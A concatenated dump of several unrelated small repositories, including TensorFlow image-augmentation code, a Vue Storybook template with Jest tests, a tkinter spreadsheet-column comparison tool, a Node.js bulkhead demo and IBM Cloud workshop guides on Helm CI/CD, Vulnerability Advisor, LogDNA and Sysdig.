Args: image: 3-D Tensor of shape [height, width, channels] require_static: If `True`, requires that all dimensions of `image` are known and non-zero. Raises: ValueError: if `image.shape` is not a 3-vector. Returns: An empty list, if `image` has fully defined dimensions. Otherwise, a list containing an assert op is returned. """ try: image_shape = image.get_shape().with_rank(3) except ValueError: raise ValueError("'image' must be three-dimensional.") if require_static and not image_shape.is_fully_defined(): raise ValueError("'image' must be fully defined.") if any(x == 0 for x in image_shape): raise ValueError("all dims of 'image.shape' must be > 0: %s" % image_shape) if not image_shape.is_fully_defined(): return [tf.assert_positive(tf.shape(image), ["all dims of 'image.shape' " "must be > 0."])] else: return [] def random_flip_left_right(image, bboxes, seed=None): """Random flip left-right of an image and its bounding boxes. 随机翻转图像及其边界框的左右两侧。 """ def flip_bboxes(bboxes): """Flip bounding boxes coordinates. """ bboxes = tf.stack([bboxes[:, 0], 1 - bboxes[:, 3], bboxes[:, 2], 1 - bboxes[:, 1]], axis=-1) return bboxes # Random flip. Tensorflow implementation. with tf.name_scope('random_flip_left_right'): image = tf.convert_to_tensor(image, name='image') _check3dimage(image, require_static=False) uniform_random = tf.random_uniform([], 0, 1.0, seed=seed) mirror_cond = tf.less(uniform_random, .5) # Flip image. result = tf.cond(mirror_cond, lambda: tf.reverse_v2(image, [1]), lambda: image) # Flip bboxes. bboxes = tf.cond(mirror_cond, lambda: flip_bboxes(bboxes), lambda: bboxes) image_shape = image.get_shape() result.set_shape(image_shape) return result, bboxes def tf_image_whitened(image, means=(_R_MEAN, _G_MEAN, _B_MEAN)): """Subtracts the given means from each image channel. Returns: the centered image. 
""" if image.get_shape().ndims != 3: raise ValueError('Input must be of size [height, width, C>0]') num_channels = image.get_shape().as_list()[-1] if len(means) != num_channels: raise ValueError('len(means) must match the number of channels') mean = tf.constant(means, dtype=image.dtype) image = image - mean return image def distort_color(image, color_ordering=0, fast_mode=True, scope=None): #扭曲颜色 """Distort the color of a Tensor image. Each color distortion is non-commutative and thus ordering of the color ops matters. Ideally we would randomly permute the ordering of the color ops. Rather then adding that level of complication, we select a distinct ordering of color ops for each preprocessing thread. Args: image: 3-D Tensor containing single image in [0, 1]. color_ordering: Python int, a type of distortion (valid values: 0-3). fast_mode: Avoids slower ops (random_hue and random_contrast) scope: Optional scope for name_scope. Returns: 3-D Tensor color-distorted image on range [0, 1] Raises: ValueError: if color_ordering not in [0, 3] """ with tf.name_scope(scope, 'distort_color', [image]): if fast_mode: if color_ordering == 0: image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) else: image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_brightness(image, max_delta=32. / 255.) else: if color_ordering == 0: image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_hue(image, max_delta=0.2) image = tf.image.random_contrast(image, lower=0.5, upper=1.5) elif color_ordering == 1: image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_brightness(image, max_delta=32. / 255.) 
image = tf.image.random_contrast(image, lower=0.5, upper=1.5) image = tf.image.random_hue(image, max_delta=0.2) elif color_ordering == 2: image = tf.image.random_contrast(image, lower=0.5, upper=1.5) image = tf.image.random_hue(image, max_delta=0.2) image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) elif color_ordering == 3: image = tf.image.random_hue(image, max_delta=0.2) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_contrast(image, lower=0.5, upper=1.5) image = tf.image.random_brightness(image, max_delta=32. / 255.) else: raise ValueError('color_ordering must be in [0, 3]') # The random_* ops do not necessarily clamp. return tf.clip_by_value(image, 0.0, 1.0) def apply_with_random_selector(x, func, num_cases): """Computes func(x, sel), with sel sampled from [0...num_cases-1]. 随机剪裁 Args: x: input Tensor. func: Python function to apply. num_cases: Python int32, number of cases to sample sel from. Returns: The result of func(x, sel), where func receives the value of the selector as a python integer, but sel is sampled dynamically. """ sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32) # Pass the real x only to one of the func calls. return control_flow_ops.merge([ func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case) for case in range(num_cases)])[0] def get_init_fn(checkpoint_path, train_dir, checkpoint_exclude_scopes, checkpoint_model_scope, model_name, ignore_missing_vars): """Returns a function run by the chief worker to warm-start the training. Note that the init_fn is only run when initializing the model during the very first global step. Returns: An init function run by the supervisor. """ if checkpoint_path is None: return None # Warn the user if a checkpoint exists in the train_dir. Then ignore. 
if tf.train.latest_checkpoint(train_dir): tf.logging.info( 'Ignoring --checkpoint_path because a checkpoint already exists in %s' % train_dir) return None exclusions = [] if checkpoint_exclude_scopes: exclusions = [scope.strip() for scope in checkpoint_exclude_scopes.split(',')] variables_to_restore = [] for var in slim.get_model_variables(): excluded = False for exclusion in exclusions: if var.op.name.startswith(exclusion): excluded = True break if not excluded: variables_to_restore.append(var) # Change model scope if necessary. if checkpoint_model_scope is not None: variables_to_restore = \ {var.op.name.replace(model_name, checkpoint_model_scope): var for var in variables_to_restore} if tf.gfile.IsDirectory(checkpoint_path): checkpoint_path = tf.train.latest_checkpoint(checkpoint_path) tf.logging.info('Fine-tuning from %s. Ignoring missing vars: %s' % (checkpoint_path, ignore_missing_vars)) return slim.assign_from_checkpoint_fn( checkpoint_path, variables_to_restore, ignore_missing_vars=ignore_missing_vars) if __name__ == '__main__': a = np.array([[2,3,4],[5,6,7]],dtype=np.float32) a = tf.reshape(a,[3,2]) print(a.shape[-1])
a2c734dc7a5faa6f6f063b0c69e6180b9ca20145
[ "Markdown", "Python" ]
8
Markdown
LeeSamoyed/deep_learning_notes
cbefb32e1429ca06d0e5fac92bd6c4d68ff802ad
dc029d767784c86c22179d6f778da9817c126e79
refs/heads/master
<repo_name>David-Tsui/vue-storybook-template<file_sep>/src/components/CalendarStory/CalendarStory.stories.js import Vue from 'vue'; import { storiesOf } from '@storybook/vue'; import { action } from '@storybook/addon-actions'; import centered from '@storybook/addon-centered/vue'; import { withKnobs } from '@storybook/addon-knobs'; import '@storybook/addon-console'; import README from './README.md'; import CalendarStory from './index'; Vue.component('CalendarStory', CalendarStory); storiesOf('CalendarStory', module) .addDecorator(withKnobs) .addDecorator(centered) .addParameters({ readme: { sidebar: README, }, }) .add('show', () => ({ methods: { log() { action('CalendarStory')(); }, }, render(h) { return <CalendarStory></CalendarStory>; }, })); <file_sep>/tests/unit/LoginPage.spec.js const loginAPI = params => new Promise((resolve) => { const { user, password } = params; setTimeout(() => { const check = user === 'admin' && password === '<PASSWORD>'; if (check) { resolve({ code: '1000', data: {}, }); } else { resolve({ code: '5000', data: {}, message: '用戶名稱或密碼錯誤', }); } }, 1500); }); describe('login api', () => { const response = { code: '1000', data: {}, }; const errorResponse = { code: '5000', data: {}, message: '用戶名稱或密碼錯誤', }; it('測試正常登入', async () => { const params = { user: 'admin', password: '<PASSWORD>', }; const resp = await loginAPI(params); expect(resp).toEqual(response); }); it('測試異常登入', async () => { const params = { user: 'admin', password: '<PASSWORD>', }; expect(await loginAPI(params)).toEqual(errorResponse); }); }); <file_sep>/tests/unit/TaskList.spec.js import Vue from 'vue'; import TaskList from '@/components/TaskList/PureTaskList.vue'; import { withPinnedTasks, withArchivedTasks, withOnlyArchivedTasks, } from '@/components/TaskList/PureTaskList.stories'; it('renders pinned tasks at the start of the list', () => { const Constructor = Vue.extend(TaskList); const vm = new Constructor({ propsData: { tasks: withPinnedTasks }, }).$mount(); const 
firstTaskPinned = vm.$el.querySelector( '.list-item:first-child.TASK_PINNED', ); // We expect the pinned task to be rendered first, not at the end expect(!Object.is(firstTaskPinned, null)); }); it('renders archived tasks at the end of the list', () => { const Constructor = Vue.extend(TaskList); const vm = new Constructor({ propsData: { tasks: withArchivedTasks }, }).$mount(); const firstTaskPinned = vm.$el.querySelector( '.list-item:last-child.TASK_ARCHIVED', ); // We expect the pinned task to be rendered first, not at the end expect(firstTaskPinned).not.toBe(null); }); it('renders list of all archived', () => { const Constructor = Vue.extend(TaskList); const vm = new Constructor({ propsData: { tasks: withOnlyArchivedTasks }, }).$mount(); const archivedItems = vm.$el.querySelectorAll('.list-item.TASK_ARCHIVED'); // We expect the pinned task to be rendered first, not at the end expect([...archivedItems].length).toBe(withOnlyArchivedTasks.length); }); <file_sep>/src/components/InboxScreen/index.js export { default } from './InboxScreen.vue'; <file_sep>/tests/unit/storybook.js import registerRequireContextHook from 'babel-plugin-require-context-hook/register'; import initStoryshots from '@storybook/addon-storyshots'; // jest.setTimeout(10000); registerRequireContextHook(); initStoryshots(); <file_sep>/src/components/LoginPage/index.js export { default } from './LoginPage.vue'; <file_sep>/stories/3-PureTaskList.stories.js import { storiesOf } from '@storybook/vue'; import { task, methods } from './2-TaskBox.stories'; import TaskList from '../src/components/PureTaskList.vue'; export const defaultTaskList = [ { ...task, id: '1', title: 'Task 1' }, { ...task, id: '2', title: 'Task 2' }, { ...task, id: '3', title: 'Task 3' }, { ...task, id: '4', title: 'Task 4' }, { ...task, id: '5', title: 'Task 5' }, { ...task, id: '6', title: 'Task 6' }, ]; export const withPinnedTasks = [ { id: '1', title: 'Task 1', state: 'TASK_PINNED' }, ...defaultTaskList.slice(1, 6), ]; export 
const withArchivedTasks = [ ...defaultTaskList, { id: '7', title: 'Task 7', state: 'TASK_ARCHIVED' }, ]; export const withOnlyArchivedTasks = (() => { const types = ['PINNED', 'ARCHIVED']; return defaultTaskList.map((_task) => { const randomIndex = 1; return { ..._task, state: `TASK_${types[randomIndex]}`, }; }); })(); const paddedList = () => ({ template: '<div style="padding: 3rem 8rem;"><story/></div>', }); storiesOf('TaskList', module) .addDecorator(paddedList) .add('default', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: defaultTaskList, }), methods, })) .add('withPinnedTasks', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: withPinnedTasks, }), methods, })) .add('withArchivedTasks', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: withArchivedTasks, }), methods, })) .add('withOnlyArchivedTasks', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: withOnlyArchivedTasks, }), methods, })) .add('loading', () => ({ components: { TaskList }, template: '<task-list loading @archiveTask="onArchiveTask" @pinTask="onPinTask"/>', methods, })) .add('empty', () => ({ components: { TaskList }, template: '<task-list @archiveTask="onArchiveTask" @pinTask="onPinTask"/>', methods, })); <file_sep>/src/components/CalendarStory/index.js export { default } from './CalendarStory.vue'; <file_sep>/src/components/CalendarStory/README.md # CalendarStory Markdown - 123 > 456<file_sep>/jest.config.js module.exports = { preset: '@vue/cli-plugin-unit-jest', 
transformIgnorePatterns: ['/node_modules/(?!(@storybook/.*\\.vue$))'], moduleNameMapper: { '\\.(jpg|jpeg|png|gif|eot|otf|webp|svg|ttf|woff|woff2|mp4|webm|wav|mp3|m4a|aac|oga|md)$': '<rootDir>/__mocks__/fileMock.js', '\\.(css|less)$': '<rootDir>/__mocks__/styleMock.js', }, }; <file_sep>/.storybook/config.js import { addDecorator, addParameters, configure } from '@storybook/vue'; import { addReadme } from 'storybook-readme/vue'; import '../src/index.css'; addDecorator(addReadme); addParameters({ readme: { codeTheme: 'github', } }); // automatically import all files ending in *.stories.js configure(require.context('../src', true, /\.stories\.js$/), module); // configure(require.context('../stories', true, /\.stories\.js$/), module); <file_sep>/src/components/InboxScreen/PureInboxScreen.stories.js import Vue from 'vue'; import Vuex from 'vuex'; import { storiesOf } from '@storybook/vue'; import { action } from '@storybook/addon-actions'; import { withKnobs } from '@storybook/addon-knobs'; import { defaultTaskList } from '../TaskList/PureTaskList.stories'; import '@storybook/addon-console'; import README from './README.md'; import PureInboxScreen from './PureInboxScreen.vue'; Vue.use(Vuex); // eslint-disable-next-line import/prefer-default-export export const store = new Vuex.Store({ state: { tasks: defaultTaskList, }, actions: { pinTask(context, id) { action('pinTask')(id); }, archiveTask(context, id) { action('archiveTask')(id); }, }, }); Vue.component('PureInboxScreen', PureInboxScreen); const paddedList = () => ({ template: '<div style="padding: 3rem 8rem;"><story/></div>', }); storiesOf('PureInboxScreen', module) .addDecorator(withKnobs) .addDecorator(paddedList) .addParameters({ readme: { sidebar: README, }, }) .add('default', () => ({ store, methods: { log() { action('PureInboxScreen')(); }, }, render(h) { return <pure-inbox-screen/>; }, })) .add('error', () => ({ methods: { log() { action('PureInboxScreen')(); }, }, render(h) { return <pure-inbox-screen 
error={true}/>; }, }));
12e8fc2b6f440812c5ddeff719aa57f4290d667d
[ "JavaScript", "Markdown" ]
12
JavaScript
David-Tsui/vue-storybook-template
037d9be7a96e14ecc72d32ac8af16157212fddbb
60cf963e6b39607789cd709b5688023d66b00757
refs/heads/master
<repo_name>bmedendorp/alpha-blog<file_sep>/config/routes.rb Rails.application.routes.draw do root 'pages#home' get 'about', to: 'pages#about' get 'download', to: 'pages#download' get 'contact', to: 'pages#contact' resources :articles end
e61065e3816968c64bf9048ebfe7209fe71ffa76
[ "Ruby" ]
1
Ruby
bmedendorp/alpha-blog
e00c179c2ac23c62a6589016679d8bde12833c76
7d6b9116f7d8a157ac43d14cfbc83a1ae7613b4e
refs/heads/master
<file_sep>[% INCLUDE header %] <h2> You need to log in </h2> [% FOR m = self.messages; m; END %] <form method="post" id="loginform"> <p>Username: <input name="username"></p> <p>Password: <input name="<PASSWORD>" type="<PASSWORD>"></p> <p><input type="submit" name="Login"></p> </form> [% INCLUDE footer %] <file_sep>CREATE TABLE user ( id integer primary key not null, username, password); INSERT INTO user values (1, "simon", "$1$qbq/wA6Q$C5p.bx1UbNWIu70p8fh18/"); /*test*/
f70e9e30cf3e2eef46fe26b2f8ac0a26145278ab
[ "SQL", "Shell" ]
2
Shell
ashanawebb/canary
9396c1675df1a55b486a79f3a39835a0e4e4b50f
84b839a424a75975ee3aca8afdd35e9dfd0ee132
refs/heads/master
<file_sep>import pandas as pd from tkinter import * from tkinter import messagebox import tkinter as t from tkinter import ttk from tkinter.filedialog import askopenfilename import re root = Tk() global fileDataA global fileDataB # Functions def openFileFunA(): global fileDataA fileTypeA = rAValue.get() if (fileTypeA == 1): fileAName = askopenfilename() fileDataA = pd.read_csv(fileAName) result = [] for i in fileDataA.columns: colChange = re.sub(r' ', '_', i) fileDataA.rename(columns={i: colChange},inplace=True) result.append(colChange) boxA['values'] = result elif (fileTypeA == 2): fileAName = askopenfilename() fileDataA = pd.read_excel(fileAName) result = [] for i in fileDataA.columns: colChange = re.sub(r' ', '_', i) fileDataA.rename(columns={i: colChange}, inplace=True) result.append(colChange) boxA['values'] = result else: messagebox.showwarning("No Format Selected", "Kindly Select Any Format First.") def openFileFunB(): global fileDataB fileTypeB = rBValue.get() if(fileTypeB == 1): fileBName = askopenfilename() fileDataB = pd.read_csv(fileBName) result = [] for i in fileDataB.columns: colChange = re.sub(r' ', '_', i) fileDataB.rename(columns={i: colChange}, inplace=True) result.append(colChange) boxB['values'] = result elif(fileTypeB == 2): fileBName = askopenfilename() fileDataB = pd.read_excel(fileBName) result = [] for i in fileDataB.columns: colChange = re.sub(r' ', '_', i) fileDataB.rename(columns={i: colChange}, inplace=True) result.append(colChange) boxB['values'] = result else: messagebox.showwarning("No Format Selected", "Kindly Select Any Format First.") def deleteResult(): x = tree.get_children() if(x != '()'): for child in x: tree.delete(child) def finalResult(): global fileDataA global fileDataB colAValue = colA.get() colBValue = colB.get() cSeriesA = pd.Series(data = fileDataA[colAValue]) cSeriesB = pd.Series(data = fileDataB[colBValue]) for num in fileDataA.index: if( cSeriesA.iloc[num] != cSeriesB.iloc[num]): tree.insert("", index=num, 
values=(num+1, cSeriesA.iloc[num], cSeriesB.iloc[num])) # About root windowWidth = root.winfo_screenwidth() windowHeight = root.winfo_screenheight() root.geometry("%dx%d+%d+%d"%(windowWidth/2, windowHeight/2, windowWidth/4, windowHeight/4)) root.minsize(int(windowWidth/2) + 85, int(windowHeight/2)) root.maxsize(windowWidth, windowHeight) root.title("Compare Sheets By <NAME>") root.iconbitmap(r"MY.ico") # Frame on Top ft = Frame(root, bg = "black", borderwidth=4) ft.pack(side="top", pady=3, padx=4, fill="x") ftLabel = Label(ft, text="Compare Sheets", font="comicsansms 13 bold") ftLabel.pack() # Frame in Middle fm = Frame(root, bg = "black", borderwidth=5) fm.pack(pady=1, padx=4, fill="x") # Left Frame in Middle Frame fmm1 = Frame(fm, bg="black", borderwidth=2) fmm1.pack(side="left") f1 = Frame(fmm1, bg = "white", borderwidth=2) f1.pack(padx=112, pady=4, anchor="center") f1Label = Label(f1, text="Select File Format", padx=3) f1Label.grid(row=0, column=0, columnspan=2, pady=1, padx=1, sticky=E+W) rAValue = t.IntVar() rA1 = t.Radiobutton(f1, text = "CSV", variable = rAValue, value = 1) rA1.grid(row=1, column=0, pady=1, sticky=E+W) rA2 = t.Radiobutton(f1, text = "Excel", variable = rAValue, value = 2) rA2.grid(row=1, column=1, pady=1, sticky=E+W) button1 = t.Button(f1, text="Open File A", command=openFileFunA) button1.grid(row=2, column=0, columnspan=2, pady=1, sticky=E+W) colA = t.StringVar() boxA = ttk.Combobox(f1, textvariable=colA, state="readonly") boxA['values'] = 'Select-Column' boxA.current(0) boxA.grid(row=3, column=0, columnspan=2) button4 = t.Button(f1, text="Clear Table", command=deleteResult) button4.grid(row=4, column=0, columnspan=2, pady=1, sticky=E+W) # Right Frame in Middle fmm2 = Frame(fm, bg="black", borderwidth=2) fmm2.pack(side="right") f2 = Frame(fmm2, bg = "white", borderwidth=2) f2.pack(padx=112, pady=4, anchor="center") f2Label = Label(f2, text="Select File Format", padx=3) f2Label.grid(row=0, column=0, columnspan=2, pady=1, padx=1, sticky=E+W) 
rBValue = t.IntVar() rB1 = t.Radiobutton(f2, text = "CSV", variable = rBValue, value = 1) rB1.grid(row=1, column=0, pady=1, sticky=W+E) rB2 = t.Radiobutton(f2, text = "Excel", variable = rBValue, value = 2) rB2.grid(row=1, column=1, pady=1, sticky=E+W) button2 = t.Button(f2, text="Open File B", command=openFileFunB) button2.grid(row=2, column=0, columnspan=2, pady=1, sticky=E+W) colB = t.StringVar() boxB = ttk.Combobox(f2, textvariable=colB, state="readonly") boxB['values'] = "Select-Column" boxB.current(0) boxB.grid(row=3, column=0, columnspan=2) button3 = t.Button(f2, text="Compare", command=finalResult) button3.grid(row=4, column=0, columnspan=2, pady=1, sticky=E+W) # Frame in Bottom fb = Frame(root, bg="black", borderwidth=4) fb.pack(side="bottom", pady=1, padx=4, fill="x") tree = ttk.Treeview(fb) tree["columns"]=("one","two","three") tree.column("one", width=10) tree.column("two") tree.column("three") tree.heading("one", text="Serial Number") tree.heading("two", text="Value in file A") tree.heading("three", text="Value in file B") tree['show'] = 'headings' tree.pack(side="right", ipadx=windowWidth, ipady=windowHeight) scroll = t.Scrollbar(tree) scroll.pack(side="right", fill="y", pady=2) scroll.configure(command=tree.yview) tree.configure(yscrollcommand=scroll.set) root.mainloop()
ea7fd7eccf455eb467c6a25b3f09b1392de36c34
[ "Python" ]
1
Python
PardeepGrewal/Comapre-Sheets-excel-csv-
c11ac6bd7f464dd47391ea37e42e89fb5a82feed
770bb6868eb943579f00e295fbe9a0f0f2f7cfa8
refs/heads/master
<file_sep># Steps to execute Bulkhead demo ## Pre-requisite 1. Node.JS & NPM installation ## Steps 1. $ cd Bulkhead/BulkHeadAPI 2. $ npm install 3. $ npm start 4. `$ cd Bulkhead/ms1` && `$ cd Bulkhead/ms2` && `$ cd Bulkhead/ms3` in three different terminals. 5. `$ npm install` in all the three terminals 6. `$ npm start` in all the three terminals. 7. Enter command `requestdb`in all the three terminals Now you can see that the first two requests are served and then the third request is served after successful completion of first two requests. ``` The database server started Currently serving request number 1 Currently serving request number 2 Served request number 1 Currently serving request number 3 Served request number 2 Served request number 3 ```<file_sep>const express = require('express') const app = express() const port = 5000 const delay = require('delay'); var sem = require('semaphore')(2); //Capacity const cors = require('cors') app.use(cors()); var count=0; var flag=0; app.get('/getMongo', function(req, res){ res.write("In the queue ... "); sem.take(function() { count+=1; res.write("Under execution ... "); console.log("Currently serving request number "+count); setTimeout(leave,15000); function leave() { sem.leave(); res.end("Executed"); flag+=1; console.log("Served request number "+flag); } //console.log(sem.available()); //})(); }); } ) app.listen(port, () => console.log(`The database server started`)) //count-=1; //console.log("Currently serving "+count+" requests"); //console.log("Served "+count+" requests"); <file_sep># Develop a Kubernetes app with Helm using Continuous Delivery & Continuous Integration Learn how to create an application in IBM Cloud™ by using a basic starter kit and a Kubernetes toolchain, and continuously deliver the app to a secure container in IBM® Cloud Kubernetes Service. 
Your continuous integration DevOps pipeline can be configured so that your code changes are automatically built and propagated to the app that’s in the Kubernetes cluster. If you already have a pipeline, you can connect it to your app. ## Steps: 1. Create a [CONTINUOUS DELIVERY](https://cloud.ibm.com/catalog/services/continuous-delivery) service in IBM Cloud. `Create the service in the same region where cluster is deployed` 2. Create a Namespace in [Container Registry](https://cloud.ibm.com/kubernetes/catalog/registry) service(if you haven't done it yet) 3. Click on **ACCESS** in the Kubernetes cluster page and click on **Enable Toolchain** ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/main.png) 4. Click on **Create** in the **Develop a Kubernetes app with Helm** option ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/1.png) 5. In the redirected page, scroll down and, click CREATE next to **IBM Cloud API Key** Wait for the values to get auto populated and click on **CREATE** the toolchain. `SELECT same region of the deployed cluster region while creating the toolchain` ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/7.png) 6. Click Delivery Pipeline and you can see the BUILD, VALIDATE and PROD stage(as shown below). The Build stage pulls the source code from your repository. It then runs jobs to compile or otherwise process the code to produce artifacts suitable for deployment. Each job runs in its own container. The artifacts are passed to follow-on stages through the build archive directory in the container. By default, this directory is the same as the directory where the source code was checked out. The Simple build job type passes the source code from your repo on as the result without modifying it. The Deploy stage contains jobs that deploy the artifacts created by the Build stage. 
![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/6.png) ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/new-main.png) 7. Click on **Deploy Helm Chart** within PROD stage to see the logs. ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/2.png) 8. Scroll down and VIEW the application by clicking in the URL mentioned near **VIEW THE APPLICATION AT** ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/5.png) ## Task 2: Update the application and redeploy it 1. Click on Eclipse Web Orion IDE in the Toolchain 2. Open the app.js file and edit res.send response to any message. `For eg: res.send('Welcome to IBM Cloud DevOps with Docker, Kubernetes and Helm Charts.I have learnt how to use the Continuous Delivery Service');` 3. In the left side, click on Git icon(second icon) and commit the changes by entering commit message in the right side. 4. Push the changes in the Outgoing branch. 5. Goto Delivery Pipeline to see the changes getting updated automatically and refresh the URL to see the updates you have made. Congratulations you have completed the lab! You have created a toolchain that deploys a "Hello World" app to a secure container in a Kubernetes cluster. You changed a message in the app and tested your change, and when you pushed the change to the repo, the delivery pipeline automatically redeployed the app! <file_sep># Secure your container images with Vulnerability Advisor Vulnerability Advisor checks the security status of container images that are provided by IBM®, third parties, or added to your organization's registry namespace.When you add an image to a namespace, the image is automatically scanned by Vulnerability Advisor to detect security issues and potential vulnerabilities. If security issues are found, instructions are provided to help fix the reported vulnerability. 
In this lab, you will learn how to secure your images and fix the vulnerabilites using Vulnerability Advisor. ## Pre-requisites 1. IBM Cloud Account ## Steps <p align="center"> <a href="https://cloud.ibm.com/developer/appservice/create-app?starterKit=ab2263e9-c787-32e6-a9d7-298c20557bbb"> <img src="https://cloud.ibm.com/devops/setup/deploy/button_x2.png" alt="Deploy to IBM Cloud"> </a> </p> Use the button above to deploy this same application to IBM Cloud. This option will create a deployment pipeline, complete with a hosted Git lab project and DevOps toolchain. You will have the option of deploying to either Cloud Foundry or a Kubernetes cluster. Step 1: Click on `Create` button to create the app Step 2: In the redirected page, Click on `Configure Continuous Delivery`.Enable continuous delivery to automate builds, tests, and deployments through Delivery Pipeline, GitLab, and more. Step 3: In the popup, Select `Deploy to IBM Kubernetes Service` and select the region where cluster is deployed and select the cluster. Click `Next` Step 4: In next step, Select the region in which cluster has been deployed and click on `Create`. Step 5: A toolchain have been created now with the starter application. Click on `View toolchain`. This will redirect you to Toolchain page. ### Security using Vulnerability Advisor 1. Click the Delivery Pipeline tile within the toolchain. 2. Follow the steps shown in below video: ![Video](./img/video_1.gif) **Please note: Container Registry namespace should be same as the one mentioned in Build Stage of this toolchain.** You will see that Validate stage fails. ### Let’s fix the vulnerabilities. 1. Open the cloned repository in an IDE or select Eclipse Orion web IDE tile, open Dockerfile and add the below command after EXPOSE 3000 ``` RUN apt-get update && apt-get install -y \ libc6 \ systemd \ sensible-utils \ isc-dhcp-client ``` 2. Commit and Push the changes. This should trigger the toolchain and fix the Validate Stage. 
Congratulations, you have completed the lab. In this lab, you have learnt how to use Vulnerability Advisor and how to fix the vulnerabilities. <file_sep># App Modernization Workshop Content 1. Container 2. Container Orchestration 3. Securing Containers 4. API Connect & App Connect 5. Transformation Advisor 6. Refactoring into microservices 7. Kabanero-Appsody-Codewind 8. DevOps- CI/CD 9. Helm Charts 10. Monitoring & Logging ## Contributors * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> <file_sep># Log Analysis with LogDNA IBM® Log Analysis with LogDNA is a service that you can include as part of your IBM Cloud architecture to add log management capabilities. IBM Log Analysis with LogDNA is operated by LogDNA in partnership with IBM. You can use IBM Log Analysis with LogDNA to manage system and application logs in the IBM Cloud.IBM Log Analysis with LogDNA offers administrators, DevOps teams, and developers advanced features to filter, search, and tail log data, define alerts, and design custom views to monitor application and system logs. ## Pre-requisites 1. IBM Cloud Account 2. Kubernetes Cluster ## Steps 1. Provide required access to user a. Go to Manage->Access(IAM) b. select Users from left side menu c. select your user name d. Click on Access policies e. Click on `Assign Access` and select `Assign Access within a resource group` f. Select `default` as Resource Group and provide `Viewer` Access. Services let it be default and click assign g. Click on `Access policies` again h. Click on `Assign Access` and select `Assign Access to resource` i. Select `Kubernetes Cluster` as service , Select `All Region` in Regions and `All Instance` in Cluster j. Provide `Editor and Administrator` role and click assign k. Click on`Access policies` again l. Click on `Assign Access` and select `Assign Access to resource ` m. Select `IBM Log Analysis with logDNA` service for All Regions , All Instance n. 
Provide `Editor , Viewer and Manager` roles and click `Assign Service` 2. Create a logDNA service a. Go to Navigation Menu on Left and select Observability b. Select Logging and click on Create Logging instance c. Choose location same as your cluster location and resource group as default d. Use Lite plan and click on Create. You will see service created 3. Get ingestion key to be used by agent a. click on `View LogDNA`, to open LogDNA Dashboard, click on `settings ->Oraganisation->APIkeys` and copy the Ingestion key present there 4. Configure Kubernetes cluster to send logs a. Go to Dashboard->Cluster->Mycluster b. open web terminal(beta) c. execute `kubectl create secret generic logdna-agent-key --from-literal=logdna-agent-key=replace_with_logDNA_ingestion_key_copied_at_step_3a` d. execute `kubectl create -f https://assets.us-south.logging.cloud.ibm.com/clients/logdna-agent-ds.yaml` e. execute `kubectl get pods` 5. Launch LogDNA Dashboard a. Go to Navigation Menu->Observability->Logging b. Click on View LogDNA to launch the dashboard Congratulations, you have completed the lab! You have learnt how to stream logs with LogDNA from the IBM Cloud Kubernetes Cluster.<file_sep># Monitoring of Kubernetes using Sysdig Dashboard. IBM® Cloud Monitoring with Sysdig is a cloud-native, and container-intelligence management system that you can include as part of your IBM Cloud architecture. Use it to gain operational visibility into the performance and health of your applications, services, and platforms. It offers administrators, DevOps teams, and developers full stack telemetry with advanced features to monitor and troubleshoot, define alerts, and design custom dashboards. IBM Cloud Monitoring with Sysdig is operated by Sysdig in partnership with IBM. ## Prerequisites 1. IBM Cloud login 2. Kubernetes Cluster ## Steps: 1. Login to IBM Cloud 2. Provide access to your user for sysdig monitoring 1.From the menu bar, click Manage > Access (IAM). 2. 
Create an access group: sysdig-admins 2.1. Select Access Groups. 2.2. Click Create. 2.3 Enter the name of the access group: sysdig-admins. 2.4 [Optional] Enter a description. 2.5 Click create. 2.6 Click Add User. 2.7 Select the user and click on add to group. 3. Add access policy to the user, which is going to use Sysdig for monitoring 3.1. In Access IAM , go to user , and select your user 3.2. Click Access Policies tab 3.3. Click Assign Access. 3.4. Select `Assign Access within a Resource Group`. 3.5. Select the name of the resource group. Choose `Default`. `Note: You can use any other resource group where you have permissions in the account.` 3.6. Select the role. Choose Administrator. 3.7. Click Assign 3.8 Add another access policy by clicking `Assign Access` 3.9 Select `Assign Access to Resources` 3.10 Select `IBM Cloud Monitoring with Sysdig` 3.11 Select `All instance` in Service Instance 3.12 Provide `Administrator` access and click `save` 4. Add Sysdig monitoring Instance 4.1. from IBM Cloud Navigation menu (Hamburger menu), go to [Observability](https://cloud.ibm.com/observe) 4.2. Click on `Monitoring` 4.3. Click on `Create a Monitoring instance` 4.4. Provide a service name 4.5. Please make sure the region is same as your Kubernetes cluster region 4.6. Select Trial version and Click create 5. Create a key in Sysdig monitoring instance and get command to run agent: 5.1 click on 3 dots at right hand side of monitoring instance created and select on add key. 5.2 click on edit sources and copy the command 